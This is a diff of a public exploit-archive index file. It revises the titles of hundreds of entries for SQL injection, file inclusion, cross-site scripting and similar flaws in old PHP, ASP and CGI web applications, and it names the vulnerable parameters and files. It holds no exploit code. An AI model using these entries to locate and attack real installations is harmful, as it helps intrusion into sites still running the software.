+6092,platforms/php/webapps/6092.txt,"Alstrasoft Video Share Enterprise 4.5.1 - 'UID' Parameter SQL Injection",2008-07-17,"Hussin X",php,webapps,0 6095,platforms/php/webapps/6095.pl,"Alstrasoft Article Manager Pro 1.6 - Blind SQL Injection",2008-07-17,GoLd_M,php,webapps,0 6096,platforms/php/webapps/6096.txt,"preCMS 1 - 'index.php' SQL Injection",2008-07-17,Mr.SQL,php,webapps,0 -6097,platforms/php/webapps/6097.txt,"Arctic Issue Tracker 2.0.0 - (index.php filter) SQL Injection",2008-07-17,QTRinux,php,webapps,0 -6098,platforms/php/webapps/6098.txt,"Aprox CMS Engine 5.(1.0.4) - 'index.php' SQL Injection",2008-07-18,Mr.SQL,php,webapps,0 -6099,platforms/php/webapps/6099.txt,"Siteframe - 'folder.php id' SQL Injection",2008-07-18,n0ne,php,webapps,0 -6102,platforms/php/webapps/6102.txt,"PHPFootball 1.6 - (show.php) SQL Injection",2008-07-20,Mr.SQL,php,webapps,0 -6104,platforms/asp/webapps/6104.pl,"DigiLeave 1.2 - (info_book.asp book_id) Blind SQL Injection",2008-07-21,Mr.SQL,asp,webapps,0 -6105,platforms/asp/webapps/6105.pl,"HRS Multi - 'picture_pic_bv.asp key' Blind SQL Injection",2008-07-21,Mr.SQL,asp,webapps,0 +6097,platforms/php/webapps/6097.txt,"Arctic Issue Tracker 2.0.0 - 'filter' Parameter SQL Injection",2008-07-17,QTRinux,php,webapps,0 +6098,platforms/php/webapps/6098.txt,"Aprox CMS Engine 5.1.0.4 - 'index.php' SQL Injection",2008-07-18,Mr.SQL,php,webapps,0 +6099,platforms/php/webapps/6099.txt,"Siteframe CMS 3.2.3 - 'folder.php' SQL Injection",2008-07-18,n0ne,php,webapps,0 +6102,platforms/php/webapps/6102.txt,"PHPFootball 1.6 - SQL Injection",2008-07-20,Mr.SQL,php,webapps,0 +6104,platforms/asp/webapps/6104.pl,"DigiLeave 1.2 - 'book_id' Parameter Blind SQL Injection",2008-07-21,Mr.SQL,asp,webapps,0 +6105,platforms/asp/webapps/6105.pl,"HRS Multi - 'key' Parameter Blind SQL Injection",2008-07-21,Mr.SQL,asp,webapps,0 6107,platforms/php/webapps/6107.txt,"Interact 2.4.1 - 'help.php' Local File Inclusion",2008-07-21,DSecRG,php,webapps,0 6108,platforms/cgi/webapps/6108.pl,"MojoClassifieds 2.0 - Blind SQL Injection",2008-07-21,Mr.SQL,cgi,webapps,0 -6109,platforms/cgi/webapps/6109.pl,"MojoPersonals - 'mojoClassified.cgi mojo' Blind SQL Injection",2008-07-21,Mr.SQL,cgi,webapps,0 -6110,platforms/cgi/webapps/6110.pl,"MojoJobs - 'mojoJobs.cgi mojo' Blind SQL Injection",2008-07-21,Mr.SQL,cgi,webapps,0 -6111,platforms/cgi/webapps/6111.pl,"MojoAuto - 'mojoAuto.cgi mojo' Blind SQL Injection",2008-07-21,Mr.SQL,cgi,webapps,0 -6112,platforms/php/webapps/6112.txt,"EZWebAlbum (dlfilename) - Remote File Disclosure",2008-07-21,"Ghost Hacker",php,webapps,0 -6113,platforms/php/webapps/6113.pl,"Arctic Issue Tracker 2.0.0 - (index.php filter) SQL Injection",2008-07-21,ldma,php,webapps,0 -6114,platforms/php/webapps/6114.txt,"ShopCartDx 4.30 - 'pid' SQL Injection",2008-07-21,Cr@zy_King,php,webapps,0 +6109,platforms/cgi/webapps/6109.pl,"MojoPersonals - Blind SQL Injection",2008-07-21,Mr.SQL,cgi,webapps,0 +6110,platforms/cgi/webapps/6110.pl,"MojoJobs - Blind SQL Injection",2008-07-21,Mr.SQL,cgi,webapps,0 +6111,platforms/cgi/webapps/6111.pl,"MojoAuto - Blind SQL Injection",2008-07-21,Mr.SQL,cgi,webapps,0 +6112,platforms/php/webapps/6112.txt,"EZWebAlbum - Remote File Disclosure",2008-07-21,"Ghost Hacker",php,webapps,0 +6113,platforms/php/webapps/6113.pl,"Arctic Issue Tracker 2.0.0 - 'filter' Parameter SQL Injection",2008-07-21,ldma,php,webapps,0 +6114,platforms/php/webapps/6114.txt,"ShopCartDx 4.30 - 'pid' Parameter SQL Injection",2008-07-21,Cr@zy_King,php,webapps,0 6115,platforms/php/webapps/6115.txt,"EZWebAlbum - Insecure Cookie Handling",2008-07-21,"Virangar Security",php,webapps,0 -6117,platforms/php/webapps/6117.txt,"YouTube blog 0.1 - (Remote File Inclusion / SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2008-07-22,Unohope,php,webapps,0 -6119,platforms/asp/webapps/6119.txt,"Pre Survey Poll - 'default.asp catid' SQL Injection",2008-07-22,DreamTurk,asp,webapps,0 -6125,platforms/php/webapps/6125.txt,"Atom Photoblog 1.1.5b1 - (photoId) SQL Injection",2008-07-24,Mr.SQL,php,webapps,0 -6126,platforms/php/webapps/6126.txt,"ibase 2.03 - 'download.php' Remote File Disclosure",2008-07-24,Dyshoo,php,webapps,0 +6117,platforms/php/webapps/6117.txt,"YouTube blog 0.1 - Remote File Inclusion / SQL Injection / Cross-Site Scripting",2008-07-22,Unohope,php,webapps,0 +6119,platforms/asp/webapps/6119.txt,"Pre Survey Poll - 'catid' Parameter SQL Injection",2008-07-22,DreamTurk,asp,webapps,0 +6125,platforms/php/webapps/6125.txt,"Atom Photoblog 1.1.5b1 - 'photoId' Parameter SQL Injection",2008-07-24,Mr.SQL,php,webapps,0 +6126,platforms/php/webapps/6126.txt,"ibase 2.03 - Remote File Disclosure",2008-07-24,Dyshoo,php,webapps,0 6127,platforms/php/webapps/6127.htm,"WordPress Plugin Download Manager 0.2 - Arbitrary File Upload",2008-07-24,SaO,php,webapps,0 -6128,platforms/php/webapps/6128.txt,"Live Music Plus 1.1.0 - 'id' SQL Injection",2008-07-24,IRAQI,php,webapps,0 -6131,platforms/php/webapps/6131.txt,"xrms 1.99.2 - (Remote File Inclusion / Cross-Site Scripting / Information Gathering) Multiple Vulnerabilities",2008-07-25,AzzCoder,php,webapps,0 +6128,platforms/php/webapps/6128.txt,"Live Music Plus 1.1.0 - 'id' Parameter SQL Injection",2008-07-24,IRAQI,php,webapps,0 +6131,platforms/php/webapps/6131.txt,"XRms 1.99.2 - Remote File Inclusion / Cross-Site Scripting / Information Gathering",2008-07-25,AzzCoder,php,webapps,0 6132,platforms/php/webapps/6132.txt,"Camera Life 2.6.2 - 'id' SQL Injection",2008-07-25,nuclear,php,webapps,0 -6133,platforms/php/webapps/6133.txt,"FizzMedia 1.51.2 - (comment.php mid) SQL Injection",2008-07-25,Mr.SQL,php,webapps,0 -6134,platforms/php/webapps/6134.txt,"PHPTest 0.6.3 - (picture.php image_id) SQL Injection",2008-07-25,cOndemned,php,webapps,0 +6133,platforms/php/webapps/6133.txt,"FizzMedia 1.51.2 - SQL Injection",2008-07-25,Mr.SQL,php,webapps,0 +6134,platforms/php/webapps/6134.txt,"PHPTest 0.6.3 - SQL Injection",2008-07-25,cOndemned,php,webapps,0 6135,platforms/asp/webapps/6135.txt,"FipsCMS Light 2.1 - 'r' Parameter SQL Injection",2008-07-26,U238,asp,webapps,0 6136,platforms/php/webapps/6136.txt,"PHPwebnews 0.2 MySQL Edition - (SQL) Insecure Cookie Handling",2008-07-26,"Virangar Security",php,webapps,0 6137,platforms/php/webapps/6137.txt,"IceBB 1.0-RC9.2 - Blind SQL Injection / Session Hijacking Exploit",2008-07-26,girex,php,webapps,0 -6138,platforms/php/webapps/6138.txt,"Mobius 1.4.4.1 - (browse.php id) SQL Injection",2008-07-26,dun,php,webapps,0 -6139,platforms/php/webapps/6139.txt,"EPShop < 3.0 - 'pid' SQL Injection",2008-07-26,mikeX,php,webapps,0 +6138,platforms/php/webapps/6138.txt,"Mobius 1.4.4.1 - SQL Injection",2008-07-26,dun,php,webapps,0 +6139,platforms/php/webapps/6139.txt,"EPShop < 3.0 - 'pid' Parameter SQL Injection",2008-07-26,mikeX,php,webapps,0 6140,platforms/php/webapps/6140.txt,"phpLinkat 0.1 - Insecure Cookie Handling / SQL Injection",2008-07-26,Encrypt3d.M!nd,php,webapps,0 -6141,platforms/php/webapps/6141.txt,"TriO 2.1 - (browse.php id) SQL Injection",2008-07-26,dun,php,webapps,0 -6142,platforms/php/webapps/6142.txt,"CMScout 2.05 - (common.php bit) Local File Inclusion",2008-07-27,"Khashayar Fereidani",php,webapps,0 -6143,platforms/php/webapps/6143.txt,"Getacoder clone - (sb_protype) SQL Injection",2008-07-27,"Hussin X",php,webapps,0 -6144,platforms/php/webapps/6144.txt,"GC Auction Platinum - (cate_id) SQL Injection",2008-07-27,"Hussin X",php,webapps,0 -6145,platforms/php/webapps/6145.txt,"SiteAdmin CMS - (art) SQL Injection",2008-07-27,Cr@zy_King,php,webapps,0 +6141,platforms/php/webapps/6141.txt,"TriO 2.1 - 'browse.php' SQL Injection",2008-07-26,dun,php,webapps,0 +6142,platforms/php/webapps/6142.txt,"CMScout 2.05 - 'bit' Parameter Local File Inclusion",2008-07-27,"Khashayar Fereidani",php,webapps,0 +6143,platforms/php/webapps/6143.txt,"Getacoder clone - 'sb_protype' Parameter SQL Injection",2008-07-27,"Hussin X",php,webapps,0 +6144,platforms/php/webapps/6144.txt,"GC Auction Platinum - 'cate_id' Parameter SQL Injection",2008-07-27,"Hussin X",php,webapps,0 +6145,platforms/php/webapps/6145.txt,"SiteAdmin CMS - 'art' Parameter SQL Injection",2008-07-27,Cr@zy_King,php,webapps,0 6146,platforms/php/webapps/6146.txt,"Pligg CMS 9.9.0 - 'story.php' SQL Injection",2008-07-28,"Hussin X",php,webapps,0 -6147,platforms/php/webapps/6147.txt,"Youtuber Clone - 'ugroups.php UID' SQL Injection",2008-07-28,"Hussin X",php,webapps,0 +6147,platforms/php/webapps/6147.txt,"Youtuber Clone - SQL Injection",2008-07-28,"Hussin X",php,webapps,0 6148,platforms/php/webapps/6148.txt,"TalkBack 2.3.5 - 'Language' Local File Inclusion",2008-07-28,NoGe,php,webapps,0 6149,platforms/php/webapps/6149.txt,"Dokeos E-Learning System 1.8.5 - Local File Inclusion",2008-07-28,DSecRG,php,webapps,0 -6150,platforms/php/webapps/6150.txt,"PixelPost 1.7.1 - (language_full) Local File Inclusion",2008-07-28,DSecRG,php,webapps,0 +6150,platforms/php/webapps/6150.txt,"PixelPost 1.7.1 - 'language_full' Parameter Local File Inclusion",2008-07-28,DSecRG,php,webapps,0 6153,platforms/php/webapps/6153.txt,"ATutor 1.6.1-pl1 - 'import.php' Remote File Inclusion",2008-07-28,"Khashayar Fereidani",php,webapps,0 -6154,platforms/php/webapps/6154.txt,"ViArt Shop 3.5 - (category_id) SQL Injection",2008-07-28,"GulfTech Security",php,webapps,0 -6156,platforms/php/webapps/6156.txt,"Minishowcase 09b136 - 'lang' Local File Inclusion",2008-07-29,DSecRG,php,webapps,0 +6154,platforms/php/webapps/6154.txt,"ViArt Shop 3.5 - 'category_id' Parameter SQL Injection",2008-07-28,"GulfTech Security",php,webapps,0 +6156,platforms/php/webapps/6156.txt,"Minishowcase 09b136 - 'lang' Parameter Local File Inclusion",2008-07-29,DSecRG,php,webapps,0 6158,platforms/php/webapps/6158.pl,"e107 Plugin BLOG Engine 2.2 - Blind SQL Injection",2008-07-29,"Virangar Security",php,webapps,0 -6159,platforms/php/webapps/6159.txt,"Gregarius 0.5.4 - rsargs[] SQL Injection",2008-07-29,"GulfTech Security",php,webapps,0 -6160,platforms/php/webapps/6160.txt,"PHP Hosting Directory 2.0 - (admin.php rd) Remote File Inclusion",2008-07-29,RoMaNcYxHaCkEr,php,webapps,0 -6161,platforms/php/webapps/6161.txt,"HIOX Random Ad 1.3 - (hioxRandomAd.php hm) Remote File Inclusion",2008-07-30,"Ghost Hacker",php,webapps,0 -6162,platforms/php/webapps/6162.txt,"hiox browser Statistics 2.0 - Remote File Inclusion",2008-07-30,"Ghost Hacker",php,webapps,0 +6159,platforms/php/webapps/6159.txt,"Gregarius 0.5.4 - SQL Injection",2008-07-29,"GulfTech Security",php,webapps,0 +6160,platforms/php/webapps/6160.txt,"PHP Hosting Directory 2.0 - Remote File Inclusion",2008-07-29,RoMaNcYxHaCkEr,php,webapps,0 +6161,platforms/php/webapps/6161.txt,"HIOX Random Ad 1.3 - Remote File Inclusion",2008-07-30,"Ghost Hacker",php,webapps,0 +6162,platforms/php/webapps/6162.txt,"HIOX Browser Statistics 2.0 - Remote File Inclusion",2008-07-30,"Ghost Hacker",php,webapps,0 6163,platforms/php/webapps/6163.txt,"PHP Hosting Directory 2.0 - Insecure Cookie Handling",2008-07-30,Stack,php,webapps,0 -6164,platforms/php/webapps/6164.txt,"nzFotolog 0.4.1 - (action_file) Local File Inclusion",2008-07-30,"Khashayar Fereidani",php,webapps,0 -6165,platforms/php/webapps/6165.txt,"ZeeReviews - 'comments.php ItemID' SQL Injection",2008-07-30,Mr.SQL,php,webapps,0 +6164,platforms/php/webapps/6164.txt,"nzFotolog 0.4.1 - 'action_file' Parameter Local File Inclusion",2008-07-30,"Khashayar Fereidani",php,webapps,0 +6165,platforms/php/webapps/6165.txt,"ZeeReviews - SQL Injection",2008-07-30,Mr.SQL,php,webapps,0 6166,platforms/php/webapps/6166.php,"HIOX Random Ad 1.3 - Arbitrary Add Admin",2008-07-30,Stack,php,webapps,0 -6167,platforms/php/webapps/6167.txt,"Article Friendly Pro/Standard - (Cat) SQL Injection",2008-07-30,Mr.SQL,php,webapps,0 +6167,platforms/php/webapps/6167.txt,"Article Friendly Pro/Standard - SQL Injection",2008-07-30,Mr.SQL,php,webapps,0 6168,platforms/php/webapps/6168.php,"HIOX Browser Statistics 2.0 - Arbitrary Add Admin",2008-07-30,Stack,php,webapps,0 -6169,platforms/php/webapps/6169.txt,"PozScripts Classified Ads Script - 'cid' SQL Injection",2008-07-30,"Hussin X",php,webapps,0 -6170,platforms/php/webapps/6170.txt,"TubeGuru Video Sharing Script - (UID) SQL Injection",2008-07-30,"Hussin X",php,webapps,0 +6169,platforms/php/webapps/6169.txt,"PozScripts Classified Ads Script - 'cid' Parameter SQL Injection",2008-07-30,"Hussin X",php,webapps,0 +6170,platforms/php/webapps/6170.txt,"TubeGuru Video Sharing Script - 'UID' Parameter SQL Injection",2008-07-30,"Hussin X",php,webapps,0 6171,platforms/php/webapps/6171.pl,"eNdonesia 8.4 (Calendar Module) - SQL Injection",2008-07-30,Jack,php,webapps,0 6172,platforms/php/webapps/6172.pl,"Pligg 9.9.0 - Remote Code Execution",2008-07-30,"GulfTech Security",php,webapps,0 -6173,platforms/php/webapps/6173.txt,"pligg 9.9.0 - (Cross-Site Scripting / Local File Inclusion / SQL Injection) Multiple Vulnerabilities",2008-07-30,"GulfTech Security",php,webapps,0 +6173,platforms/php/webapps/6173.txt,"pligg 9.9.0 - Cross-Site Scripting / Local File Inclusion / SQL Injection",2008-07-30,"GulfTech Security",php,webapps,0 6176,platforms/php/webapps/6176.txt,"PHPX 3.5.16 - Cookie Poisoning / Login Bypass",2008-07-31,gnix,php,webapps,0 6177,platforms/php/webapps/6177.php,"Symphony 1.7.01 - (non-patched) Remote Code Execution",2008-07-31,Raz0r,php,webapps,0 6178,platforms/php/webapps/6178.php,"Coppermine Photo Gallery 1.4.18 - Local File Inclusion / Remote Code Execution",2008-07-31,EgiX,php,webapps,0 @@ -19606,7 +19609,7 @@ id,file,description,date,author,platform,type,port 6707,platforms/php/webapps/6707.txt,"Gforge 4.5.19 - Multiple SQL Injections",2008-10-09,beford,php,webapps,0 6708,platforms/php/webapps/6708.txt,"Gforge 4.6 rc1 - (skill_edit) SQL Injection",2008-10-09,beford,php,webapps,0 6709,platforms/php/webapps/6709.txt,"Joomla! Component Joomtracker 1.01 - SQL Injection",2008-10-09,rsauron,php,webapps,0 -6710,platforms/php/webapps/6710.txt,"camera life 2.6.2b4 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2008-10-09,BackDoor,php,webapps,0 +6710,platforms/php/webapps/6710.txt,"camera Life 2.6.2b4 - SQL Injection / Cross-Site Scripting",2008-10-09,BackDoor,php,webapps,0 6711,platforms/php/webapps/6711.htm,"Kusaba 1.0.4 - Remote Code Execution (2)",2008-10-09,Sausage,php,webapps,0 6712,platforms/php/webapps/6712.txt,"IranMC Arad Center - 'news.php id' SQL Injection",2008-10-09,"Hussin X",php,webapps,0 6713,platforms/php/webapps/6713.txt,"Scriptsez Mini Hosting Panel - 'members.php' Local File Inclusion",2008-10-09,JosS,php,webapps,0 @@ -19924,7 +19927,7 @@ id,file,description,date,author,platform,type,port 7097,platforms/php/webapps/7097.txt,"Joomla! Component com_marketplace 1.2.1 - 'catid' SQL Injection",2008-11-11,TR-ShaRk,php,webapps,0 7098,platforms/php/webapps/7098.txt,"PozScripts Business Directory Script - 'cid' SQL Injection",2008-11-11,"Hussin X",php,webapps,0 7101,platforms/php/webapps/7101.txt,"Alstrasoft SendIt Pro - Arbitrary File Upload",2008-11-12,ZoRLu,php,webapps,0 -7102,platforms/php/webapps/7102.txt,"Alstrasoft Article Manager Pro - (Authentication Bypass) SQL Injection",2008-11-12,ZoRLu,php,webapps,0 +7102,platforms/php/webapps/7102.txt,"Alstrasoft Article Manager Pro 1.6 - Authentication Bypass",2008-11-12,ZoRLu,php,webapps,0 7103,platforms/php/webapps/7103.txt,"Alstrasoft Web Host Directory - (Authentication Bypass) SQL Injection",2008-11-12,ZoRLu,php,webapps,0 7105,platforms/php/webapps/7105.txt,"Quick Poll Script - 'code.php id' SQL Injection",2008-11-12,"Hussin X",php,webapps,0 7106,platforms/php/webapps/7106.txt,"TurnkeyForms Local Classifieds - Authentication Bypass",2008-11-12,G4N0K,php,webapps,0 @@ -20339,12 +20342,12 @@ id,file,description,date,author,platform,type,port 7625,platforms/php/webapps/7625.txt,"CMScout 2.06 - SQL Injection / Local File Inclusion",2008-12-30,SirGod,php,webapps,0 7626,platforms/php/webapps/7626.txt,"Mole Group Vacation Estate Listing Script - (editid1) Blind SQL Injection",2008-12-30,x0r,php,webapps,0 7627,platforms/asp/webapps/7627.txt,"Pixel8 Web Photo Album 3.0 - SQL Injection",2008-12-30,AlpHaNiX,asp,webapps,0 -7628,platforms/php/webapps/7628.txt,"viart shopping cart 3.5 - Multiple Vulnerabilities",2009-01-01,"Xia Shing Zee",php,webapps,0 +7628,platforms/php/webapps/7628.txt,"Viart shopping cart 3.5 - Multiple Vulnerabilities",2009-01-01,"Xia Shing Zee",php,webapps,0 7629,platforms/php/webapps/7629.txt,"DDL-Speed Script - (acp/backup) Admin Backup Bypass",2009-01-01,tmh,php,webapps,0 7631,platforms/php/webapps/7631.txt,"2Capsule - 'sticker.php id' SQL Injection",2009-01-01,Zenith,php,webapps,0 7633,platforms/php/webapps/7633.txt,"EggBlog 3.1.10 - Cross-Site Request Forgery (Change Admin Password)",2009-01-01,x0r,php,webapps,0 7635,platforms/php/webapps/7635.txt,"ASPThai.Net WebBoard 6.0 - (bview.asp) SQL Injection",2009-01-01,DaiMon,php,webapps,0 -7636,platforms/php/webapps/7636.pl,"PHPFootball 1.6 - (filter.php) Remote Hash Disclosure",2009-01-01,KinG-LioN,php,webapps,0 +7636,platforms/php/webapps/7636.pl,"PHPFootball 1.6 - Remote Hash Disclosure",2009-01-01,KinG-LioN,php,webapps,0 7638,platforms/php/webapps/7638.txt,"Memberkit 1.0 - Remote Arbitrary .PHP File Upload",2009-01-01,Lo$er,php,webapps,0 7639,platforms/php/webapps/7639.txt,"phpScribe 0.9 - (user.cfg) Remote Config Disclosure",2009-01-01,ahmadbady,php,webapps,0 7640,platforms/php/webapps/7640.txt,"w3blabor CMS 3.3.0 - (Authentication Bypass) SQL Injection",2009-01-01,DNX,php,webapps,0 @@ -21232,8 +21235,8 @@ id,file,description,date,author,platform,type,port 9091,platforms/php/webapps/9091.php,"Mlffat 2.2 - Blind SQL Injection",2009-07-09,Qabandi,php,webapps,0 9092,platforms/php/webapps/9092.txt,"webasyst shop-script - (Blind SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2009-07-09,Vrs-hCk,php,webapps,0 9094,platforms/php/webapps/9094.txt,"EasyVillaRentalSite - 'id' SQL Injection",2009-07-09,BazOka-HaCkEr,php,webapps,0 -9095,platforms/php/webapps/9095.txt,"talkback 2.3.14 - Multiple Vulnerabilities",2009-07-09,JIKO,php,webapps,0 -9098,platforms/php/webapps/9098.txt,"Siteframe CMS 3.2.x - (SQL Injection / phpinfo()) Multiple Vulnerabilities",2009-07-09,NoGe,php,webapps,0 +9095,platforms/php/webapps/9095.txt,"TalkBack 2.3.14 - Multiple Vulnerabilities",2009-07-09,JIKO,php,webapps,0 +9098,platforms/php/webapps/9098.txt,"Siteframe CMS 3.2.x - SQL Injection / phpinfo()",2009-07-09,NoGe,php,webapps,0 9099,platforms/php/webapps/9099.pl,"Universe CMS 1.0.6 - (vnews.php id) SQL Injection",2009-07-09,Mr.tro0oqy,php,webapps,0 9101,platforms/php/webapps/9101.txt,"phpbms 0.96 - Multiple Vulnerabilities",2009-07-10,eLwaux,php,webapps,0 9103,platforms/php/webapps/9103.txt,"gencms 2006 - Multiple Vulnerabilities",2009-07-10,eLwaux,php,webapps,0 @@ -23256,7 +23259,7 @@ id,file,description,date,author,platform,type,port 12798,platforms/php/webapps/12798.txt,"Webiz - SQL Injection",2010-05-29,kannibal615,php,webapps,0 12801,platforms/php/webapps/12801.txt,"osCommerce Online Merchant 2.2 - File Disclosure / Authentication Bypass",2010-05-30,Flyff666,php,webapps,0 12805,platforms/php/webapps/12805.txt,"Zeeways Script - Multiple Vulnerabilities",2010-05-30,XroGuE,php,webapps,0 -12806,platforms/php/webapps/12806.txt,"CMScout - (Cross-Site Scripting / HTML Injection) Multiple Vulnerabilities",2010-05-30,XroGuE,php,webapps,0 +12806,platforms/php/webapps/12806.txt,"CMScout - Cross-Site Scripting / HTML Injection",2010-05-30,XroGuE,php,webapps,0 12807,platforms/php/webapps/12807.txt,"Creato Script - SQL Injection",2010-05-30,Mr.P3rfekT,php,webapps,0 12808,platforms/php/webapps/12808.txt,"PTC Site's - Remote Code Execution / Cross-Site Scripting",2010-05-30,CrazyMember,php,webapps,0 12809,platforms/php/webapps/12809.txt,"Symphony CMS - Local File Inclusion",2010-05-30,AntiSecurity,php,webapps,0 @@ -23537,7 +23540,7 @@ id,file,description,date,author,platform,type,port 14274,platforms/php/webapps/14274.txt,"Joomla! Component 'Music Manager' - Local File Inclusion",2010-07-08,Sid3^effects,php,webapps,0 14123,platforms/php/webapps/14123.txt,"WebDM CMS - SQL Injection",2010-06-29,"Dr.0rYX AND Cr3W-DZ",php,webapps,0 14124,platforms/php/webapps/14124.pl,"PHP-Nuke 8.0 - SQL Injection",2010-06-30,Dante90,php,webapps,0 -14125,platforms/php/webapps/14125.pl,"ShopCartDx 4.30 - (products.php) Blind SQL Injection",2010-06-30,Dante90,php,webapps,0 +14125,platforms/php/webapps/14125.pl,"ShopCartDx 4.30 - 'products.php' Blind SQL Injection",2010-06-30,Dante90,php,webapps,0 14126,platforms/php/webapps/14126.txt,"Joomla! Component 'com_gamesbox' 1.0.2 - 'id' SQL Injection",2010-06-30,v3n0m,php,webapps,0 14127,platforms/php/webapps/14127.txt,"Joomla! Component 'Joomanager' - SQL Injection",2010-06-30,Sid3^effects,php,webapps,0 14141,platforms/php/webapps/14141.pl,"Oxygen2PHP 1.1.3 - 'member.php' SQL Injection",2010-06-30,Dante90,php,webapps,0 @@ -24149,7 +24152,7 @@ id,file,description,date,author,platform,type,port 15568,platforms/php/webapps/15568.py,"chCounter 3.1.3 - SQL Injection",2010-11-18,"Matias Fontanini",php,webapps,0 15570,platforms/php/webapps/15570.php,"Joomla! Component 'com_mtree' 2.1.6 - Overwrite Cross-Site Request Forgery",2010-11-18,jdc,php,webapps,0 15571,platforms/php/webapps/15571.txt,"fozzcom shopping<= 7.94+8.04 - Multiple Vulnerabilities",2010-11-18,"Dr.0rYX AND Cr3W-DZ",php,webapps,0 -15572,platforms/php/webapps/15572.txt,"viart shop 4.0.5 - Multiple Vulnerabilities",2010-11-19,Ariko-Security,php,webapps,0 +15572,platforms/php/webapps/15572.txt,"ViArt Shop 4.0.5 - Multiple Vulnerabilities",2010-11-19,Ariko-Security,php,webapps,0 15573,platforms/php/webapps/15573.html,"PHPGallery 1.1.0 - Cross-Site Request Forgery",2010-11-19,Or4nG.M4N,php,webapps,0 15574,platforms/php/webapps/15574.txt,"Arabian YouTube Script - Blind SQL Injection",2010-11-19,R3d-D3V!L,php,webapps,0 15577,platforms/php/webapps/15577.html,"Plogger Gallery 1.0 - Cross-Site Request Forgery (Change Admin Password)",2010-11-19,Or4nG.M4N,php,webapps,0 @@ -24292,7 +24295,7 @@ id,file,description,date,author,platform,type,port 15848,platforms/php/webapps/15848.txt,"PHP-AddressBook 6.2.4 - (group.php) SQL Injection",2010-12-29,hiphop,php,webapps,0 15849,platforms/php/webapps/15849.txt,"LoveCMS 1.6.2 - Cross-Site Request Forgery / Code Injection",2010-12-29,hiphop,php,webapps,0 15850,platforms/php/webapps/15850.html,"PiXie CMS 1.04 - Multiple Cross-Site Request Forgery Vulnerabilities",2010-12-29,"Ali Raheem",php,webapps,0 -15852,platforms/php/webapps/15852.txt,"Siteframe 3.2.3 - (user.php) SQL Injection",2010-12-29,"AnGrY BoY",php,webapps,0 +15852,platforms/php/webapps/15852.txt,"Siteframe CMS 3.2.3 - 'user.php' SQL Injection",2010-12-29,"AnGrY BoY",php,webapps,0 15853,platforms/php/webapps/15853.txt,"DGNews 2.1 - SQL Injection",2010-12-29,kalashnikov,php,webapps,0 15856,platforms/php/webapps/15856.php,"TYPO3 - Unauthenticated Arbitrary File Retrieval",2010-12-29,ikki,php,webapps,0 15857,platforms/php/webapps/15857.txt,"Discovery TorrentTrader 2.6 - Multiple Vulnerabilities",2010-12-29,EsS4ndre,php,webapps,0 @@ -24338,7 +24341,7 @@ id,file,description,date,author,platform,type,port 15987,platforms/cgi/webapps/15987.py,"SiteScape Enterprise Forum 7 - TCL Injection",2011-01-13,"Spencer McIntyre",cgi,webapps,0 16020,platforms/php/webapps/16020.txt,"PHP Lowbids - viewfaqs.php Blind SQL Injection",2011-01-20,"BorN To K!LL",php,webapps,0 15989,platforms/php/webapps/15989.txt,"Joomla! Component 'com_people' 1.0.0 - SQL Injection",2011-01-14,"Salvatore Fresta",php,webapps,0 -15993,platforms/php/webapps/15993.html,"viart shop 4.0.5 - Cross-Site Request Forgery",2011-01-15,Or4nG.M4N,php,webapps,0 +15993,platforms/php/webapps/15993.html,"ViArt Shop 4.0.5 - Cross-Site Request Forgery",2011-01-15,Or4nG.M4N,php,webapps,0 15995,platforms/php/webapps/15995.txt,"glfusion CMS 1.2.1 - 'img' Persistent Cross-Site Scripting",2011-01-15,Saif,php,webapps,0 15996,platforms/php/webapps/15996.txt,"CompactCMS 1.4.1 - Multiple Vulnerabilities",2011-01-15,NLSecurity,php,webapps,0 15997,platforms/jsp/webapps/15997.py,"MeshCMS 3.5 - Remote Code Execution",2011-01-16,mr_me,jsp,webapps,0 @@ -26054,9 +26057,8 @@ id,file,description,date,author,platform,type,port 22380,platforms/cgi/webapps/22380.pl,"Smart Search 4.25 - Remote Command Execution",2003-01-05,knight420,cgi,webapps,0 22382,platforms/php/webapps/22382.txt,"Mambo Site Server 4.0.10 - 'index.php' Cross-Site Scripting",2003-03-18,"Ertan Kurt",php,webapps,0 22383,platforms/php/webapps/22383.txt,"Basit 1.0 Submit Module - Cross-Site Scripting",2003-03-19,"Ertan Kurt",php,webapps,0 -22384,platforms/php/webapps/22384.txt,"Siteframe 2.2.4 - search.php Cross-Site Scripting",2003-03-19,"Ertan Kurt",php,webapps,0 22385,platforms/php/webapps/22385.txt,"Basit 1.0 Search Module - Cross-Site Scripting",2003-03-19,"Ertan Kurt",php,webapps,0 -22386,platforms/php/webapps/22386.txt,"Siteframe 2.2.4 - download.php Information Disclosure",2003-03-19,"Ertan Kurt",php,webapps,0 +22386,platforms/php/webapps/22386.txt,"Siteframe CMS 2.2.4 - 'download.php' Information Disclosure",2003-03-19,"Ertan Kurt",php,webapps,0 22387,platforms/php/webapps/22387.txt,"DCP-Portal 5.3.1 - calendar.php Cross-Site Scripting",2003-03-19,"Ertan Kurt",php,webapps,0 22389,platforms/php/webapps/22389.txt,"XOOPS 2.0 XoopsOption - Information Disclosure",2003-03-20,"gregory Le Bras",php,webapps,0 22391,platforms/php/webapps/22391.txt,"osCommerce 2.1/2.2 - Error_Message Cross-Site Scripting",2003-03-20,"iProyectos group",php,webapps,0 @@ -26515,7 +26517,7 @@ id,file,description,date,author,platform,type,port 23637,platforms/php/webapps/23637.txt,"Qualiteam X-Cart 3.x - upgrade.php perl_binary Parameter Arbitrary Command Execution",2004-02-03,Philip,php,webapps,0 23639,platforms/php/webapps/23639.txt,"Qualiteam X-Cart 3.x - Multiple Remote Information Disclosure Vulnerabilities",2004-02-03,Philip,php,webapps,0 23640,platforms/php/webapps/23640.txt,"phpMyAdmin 2.x - Export.php File Disclosure",2004-02-03,"Cedric Cochin",php,webapps,0 -23644,platforms/php/webapps/23644.php,"phpx 3.2.3 - Multiple Vulnerabilities",2004-02-03,"Manuel L?pez",php,webapps,0 +23644,platforms/php/webapps/23644.php,"PHPX 3.2.3 - Multiple Vulnerabilities",2004-02-03,"Manuel L?pez",php,webapps,0 23645,platforms/php/webapps/23645.txt,"All Enthusiast ReviewPost PHP Pro 2.5 - showproduct.php SQL Injection",2004-02-04,G00db0y,php,webapps,0 23646,platforms/php/webapps/23646.txt,"All Enthusiast ReviewPost PHP Pro 2.5 - showcat.php SQL Injection",2004-02-04,G00db0y,php,webapps,0 23647,platforms/cgi/webapps/23647.txt,"RXGoogle.CGI 1.0/2.5 - Cross-Site Scripting",2004-02-04,"Shaun Colley",cgi,webapps,0 